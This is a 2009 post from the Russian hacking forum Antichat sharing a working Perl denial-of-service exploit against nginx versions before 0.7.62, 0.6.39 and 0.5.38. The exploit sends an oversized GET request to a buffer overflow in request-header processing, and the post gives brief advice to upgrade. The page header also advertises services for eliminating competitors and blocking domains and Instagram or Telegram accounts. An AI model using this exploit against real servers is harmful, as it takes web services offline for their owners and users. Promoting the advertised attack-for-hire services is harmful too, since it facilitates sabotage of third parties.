Форум АНТИЧАТ - nginx DoS exploit

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
nginx DoS exploit

Опции темы

Поиск в этой теме

Опции просмотра

nginx DoS exploit

30.11.2009, 21:39

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

nginx DoS exploit

Вроде на ачате до сих пор не выложили тему об этой нашумевшей уязвимости в nginx.
Опубликована где-то в сентябре.
Это переполнение буфера в функции ngx_http_process_request_headers().
Эксплойта с выполнением произвольного кода пока нет, возможна лишь атака на отказ в обслуживании поэтому выкладываю в этот раздел.
Тем, кто не любит обновляться, надо это сделать скорее.
Уязвимы версии до 0.7.62, 0.6.39 и 0.5.38
Эксплойт:

Код:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}

Как видите, отправляется банальный get-запрос с 4079 байтами мусора.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ZoneAlarm remote Denial Of Service exploit & ZoneAlarm Remote DoS eXploit	ground_zero	Защита ОС: вирусы, антивирусы, файрволы.	4	01.12.2006 15:32
VBulletin DoS Exploit	moridin	Форумы	10	17.11.2006 00:05

TEST QR: []

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход